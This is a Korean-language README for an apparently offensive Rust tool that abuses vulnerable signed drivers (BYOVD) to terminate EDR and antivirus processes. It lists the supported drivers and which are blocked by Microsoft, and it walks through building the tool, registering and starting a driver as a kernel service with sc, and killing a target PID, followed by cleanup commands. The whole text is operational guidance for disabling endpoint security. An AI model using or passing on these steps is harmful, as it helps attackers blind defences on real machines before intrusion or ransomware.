
BYOVD collection
이 프로젝트는 EDR/AV 프로세스를 종료하는 데 초점을 맞춘 BYOVD 컬렉션입니다.
현재 다음 드라이버가 지원됩니다:
| 드라이버 | 인수 이름 | 차단 여부 |
|---|---|---|
| Process Explorer | process_explorer | 예 |
| Genshin Impact | genshin | 예 |
| Rentdrv2 | rentdrv2 | 아니요 |
| TrueSight | truesight | 아니요 |
차단됨은 해당 드라이버가 Microsoft의 차단 목록에 포함되어 있으며 최신 Windows에서 실행될 수 없다는 의미입니다.
cargo build --release
rusty_drivers.exe --help
Usage: rusty_drivers.exe --pid <PID> --driver <DRIVER>
Options:
-p, --pid <PID>
-d, --driver <DRIVER>
-h, --help Print help
-V, --version Print version
실행 파일은 드라이버를 악용하기 위해 서비스를 등록하지 않으므로, 이를 수동으로 수행해야 합니다:
sc create Test123 binpath= c:\test\<DRIVER>.sys type= kernel start= auto
그런 다음 서비스를 시작할 수 있습니다:
sc start Test123
마지막으로, Process Explorer 드라이버를 사용하여 PID 1234의 프로세스를 종료하려면 다음 명령어를 사용할 수 있습니다:
rusty_drivers.exe --pid 1234 --driver process_explorer
사용 후 서비스를 정리하는 것을 잊지 마세요:
sc stop Test123
sc delete Test123